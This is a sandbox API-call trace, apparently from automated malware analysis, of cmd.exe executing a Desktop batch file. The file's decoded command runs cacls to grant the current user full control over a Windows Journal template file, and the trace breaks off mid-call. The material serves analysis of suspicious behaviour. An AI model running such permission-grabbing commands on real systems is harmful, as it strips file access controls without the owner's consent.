4 [0170.413] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0170.414] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0170.414] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0170.414] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0170.416] GetProcessHeap () returned 0x490000 [0170.416] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20c) returned 0x4a4eb0 [0170.416] GetConsoleTitleW (in: lpConsoleTitle=0x4a4eb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0170.416] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0170.416] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0170.416] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0170.416] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0170.418] GetProcessHeap () returned 0x490000 [0170.418] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400a) returned 0x4a8a70 [0170.418] GetProcessHeap () returned 0x490000 [0170.418] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a8a70 | out: hHeap=0x490000) returned 1 [0170.420] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0170.420] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0170.420] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0170.420] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0170.420] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0170.420] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0170.420] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0170.420] GetProcessHeap () returned 0x490000 [0170.420] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x58) returned 0x4a50c8 [0170.421] GetProcessHeap () returned 0x490000 [0170.421] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x72) returned 0x4a0ee0 [0170.423] GetProcessHeap () returned 0x490000 [0170.423] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x78) returned 0x4a0f60 [0170.425] GetConsoleTitleW (in: lpConsoleTitle=0x37f488, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0170.426] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0170.426] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0170.426] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0170.426] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0170.426] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0170.426] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0170.426] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0170.426] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0170.426] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0170.426] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0170.426] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0170.426] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0170.426] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0170.426] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0170.427] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0170.427] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0170.427] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0170.427] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0170.427] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0170.427] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0170.427] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0170.427] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0170.427] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0170.427] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0170.427] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0170.427] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0170.427] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0170.427] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0170.427] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0170.427] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0170.427] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0170.427] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0170.427] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0170.427] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0170.427] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0170.427] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0170.428] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0171.211] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0171.211] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0171.211] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0171.211] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0171.211] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0171.211] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0171.211] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0171.211] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0171.211] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0171.211] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0171.211] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0171.211] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0171.211] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0171.212] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0171.212] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0171.212] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0171.212] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0171.212] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0171.212] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0171.212] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0171.212] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0171.212] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0171.212] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0171.212] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0171.212] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0171.212] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0171.212] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0171.212] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0171.212] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0171.212] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0171.212] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0171.212] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0171.212] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0171.213] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0171.213] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0171.213] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0171.213] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0171.213] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0171.213] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0171.213] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0171.213] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0171.213] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0171.213] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0171.213] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0171.213] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0171.213] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0171.213] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0171.213] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0171.213] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0171.214] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0171.214] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0171.214] GetProcessHeap () returned 0x490000 [0171.214] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x210) returned 0x4a5128 [0171.214] GetProcessHeap () returned 0x490000 [0171.214] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xe2) returned 0x4a5340 [0171.216] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0171.217] GetProcessHeap () returned 0x490000 [0171.217] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x418) returned 0x4907f0 [0171.217] SetErrorMode (uMode=0x0) returned 0x0 [0171.217] SetErrorMode (uMode=0x1) returned 0x0 [0171.217] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x4907f8, lpFilePart=0x37efa8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x37efa8*="Desktop") returned 0x25 [0171.217] SetErrorMode (uMode=0x0) returned 0x1 [0171.217] GetProcessHeap () returned 0x490000 [0171.217] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4907f0, Size=0x6e) returned 0x4907f0 [0171.217] GetProcessHeap () returned 0x490000 [0171.217] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4907f0) returned 0x6e [0171.217] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0171.217] GetProcessHeap () returned 0x490000 [0171.217] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x5a) returned 0x4a5430 [0171.217] GetProcessHeap () returned 0x490000 [0171.217] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa8) returned 0x4a5498 [0171.218] GetProcessHeap () returned 0x490000 [0171.218] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4a5498, Size=0x5a) returned 0x4a5498 [0171.218] GetProcessHeap () returned 0x490000 [0171.218] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a5498) returned 0x5a [0171.218] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0171.218] GetProcessHeap () returned 0x490000 [0171.218] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xe0) returned 0x4a5500 [0171.225] GetProcessHeap () returned 0x490000 [0171.225] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4a5500, Size=0x76) returned 0x4a5500 [0171.225] GetProcessHeap () returned 0x490000 [0171.225] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a5500) returned 0x76 [0171.226] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0171.226] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x37ed44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37ed44) returned 0x4a5580 [0171.226] GetProcessHeap () returned 0x490000 [0171.226] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4a55c0 [0171.226] FindClose (in: hFindFile=0x4a5580 | out: hFindFile=0x4a5580) returned 1 [0171.226] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0171.226] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0171.227] GetConsoleTitleW (in: lpConsoleTitle=0x37f21c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0171.227] GetProcessHeap () returned 0x490000 [0171.227] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x11c) returned 0x490868 [0171.227] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0171.227] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0171.227] IdentifyCodeAuthzLevelW () returned 0x1 [0171.233] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0171.233] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0171.234] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0171.234] CloseCodeAuthzLevel () returned 0x1 [0171.234] SetErrorMode (uMode=0x0) returned 0x0 [0171.234] SetErrorMode (uMode=0x1) returned 0x0 [0171.234] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x4a5130, lpFilePart=0x37f108 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x37f108*="Ch81ANBE.bat") returned 0x32 [0171.234] SetErrorMode (uMode=0x0) returned 0x1 [0171.234] GetProcessHeap () returned 0x490000 [0171.234] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x72) returned 0x4a0fe0 [0171.234] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"", _Control=" \x09") returned 0x1 [0171.234] GetProcessHeap () returned 0x490000 [0171.234] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x76) returned 0x4a1060 [0171.234] GetProcessHeap () returned 0x490000 [0171.234] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xe4) returned 0x4910c0 [0171.234] GetProcessHeap () returned 0x490000 [0171.234] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4910c0, Size=0x78) returned 0x4910c0 [0171.234] GetProcessHeap () returned 0x490000 [0171.234] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4910c0) returned 0x78 [0171.235] CmdBatNotification () returned 0x4a5192 [0171.235] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x37f14c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0171.235] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0171.235] _get_osfhandle (_FileHandle=3) returned 0x78 [0171.235] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.236] _get_osfhandle (_FileHandle=3) returned 0x78 [0171.236] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.236] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x37f130, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x37f130*=0xe2, lpOverlapped=0x0) returned 1 [0171.237] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0171.237] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0171.238] _get_osfhandle (_FileHandle=3) returned 0x78 [0171.238] GetFileType (hFile=0x78) returned 0x1 [0171.238] _get_osfhandle (_FileHandle=3) returned 0x78 [0171.238] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0171.238] GetProcessHeap () returned 0x490000 [0171.238] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400a) returned 0x4a8a70 [0171.238] GetProcessHeap () returned 0x490000 [0171.238] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4008) returned 0x4b4aa8 [0171.239] GetProcessHeap () returned 0x490000 [0171.239] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x1a) returned 0x4a77c0 [0171.239] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0171.239] GetProcessHeap () returned 0x490000 [0171.239] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a77c0 | out: hHeap=0x490000) returned 1 [0171.239] GetProcessHeap () returned 0x490000 [0171.239] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b4aa8 | out: hHeap=0x490000) returned 1 [0171.239] GetProcessHeap () returned 0x490000 [0171.239] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a8a70 | out: hHeap=0x490000) returned 1 [0171.240] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0171.240] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0171.240] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0171.241] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0171.241] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0171.241] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0171.241] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0171.241] GetProcessHeap () returned 0x490000 [0171.241] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x58) returned 0x491140 [0171.241] GetProcessHeap () returned 0x490000 [0171.241] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x14) returned 0x4911a0 [0171.244] GetProcessHeap () returned 0x490000 [0171.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb8) returned 0x4911c0 [0171.246] _tell (_FileHandle=3) returned 32 [0171.246] _close (_FileHandle=3) returned 0 [0171.246] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x37ef04 | out: _Buffer="\r\n") returned 2 [0171.247] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.247] GetFileType (hFile=0x7) returned 0x2 [0171.575] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0171.575] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37eec4 | out: lpMode=0x37eec4) returned 1 [0171.576] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.576] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x37eef0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37eef0*=0x2) returned 1 [0171.576] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0171.576] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0171.577] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x37ef00 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0171.577] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x37ef00 | out: _Buffer=">") returned 1 [0171.577] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.577] GetFileType (hFile=0x7) returned 0x2 [0171.577] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0171.577] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37eec8 | out: lpMode=0x37eec8) returned 1 [0171.578] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.578] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x37eef4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x37eef4*=0x26) returned 1 [0171.579] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.579] GetFileType (hFile=0x7) returned 0x2 [0171.579] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0171.579] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f14c | out: lpMode=0x37f14c) returned 1 [0171.580] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.580] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4911a8*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x37f178, lpReserved=0x0 | out: lpBuffer=0x4911a8*, lpNumberOfCharsWritten=0x37f178*=0x5) returned 1 [0171.580] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x37f184 | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 88 [0171.581] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.581] GetFileType (hFile=0x7) returned 0x2 [0171.581] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0171.581] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f144 | out: lpMode=0x37f144) returned 1 [0171.582] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.582] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x37f170, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f170*=0x58) returned 1 [0171.582] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x37f1a4 | out: _Buffer="\r\n") returned 2 [0171.582] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.582] GetFileType (hFile=0x7) returned 0x2 [0171.583] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0171.583] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x37f164 | out: lpMode=0x37f164) returned 1 [0171.583] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.583] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x37f190, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x37f190*=0x2) returned 1 [0171.584] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0171.584] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0171.584] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0171.584] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0171.584] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0171.584] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0171.584] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0171.584] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0171.584] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0171.584] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0171.584] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0171.584] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0171.584] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0171.584] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0171.584] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0171.585] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0171.585] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0171.585] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0171.585] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0171.585] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0171.585] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0171.585] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0171.585] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0171.585] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0171.585] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0171.585] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0171.585] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0171.585] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0171.586] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0171.586] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0171.586] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0171.586] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0171.586] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0171.586] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0171.586] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0171.586] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0171.586] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0171.586] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0171.587] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0171.587] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0171.587] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0171.587] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0171.587] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0171.588] GetProcessHeap () returned 0x490000 [0171.588] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x418) returned 0x4a60f0 [0171.588] SetErrorMode (uMode=0x0) returned 0x0 [0171.588] SetErrorMode (uMode=0x1) returned 0x0 [0171.588] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4a60f8, lpFilePart=0x37ef48 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x37ef48*="Desktop") returned 0x25 [0171.588] SetErrorMode (uMode=0x0) returned 0x1 [0171.588] GetProcessHeap () returned 0x490000 [0171.588] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4a60f0, Size=0x60) returned 0x4a60f0 [0171.589] GetProcessHeap () returned 0x490000 [0171.589] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a60f0) returned 0x60 [0171.589] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0171.589] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0171.589] GetProcessHeap () returned 0x490000 [0171.589] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x120) returned 0x4a6158 [0171.589] GetProcessHeap () returned 0x490000 [0171.589] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x238) returned 0x4a6280 [0171.596] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0171.597] FindFirstFileExW (in: 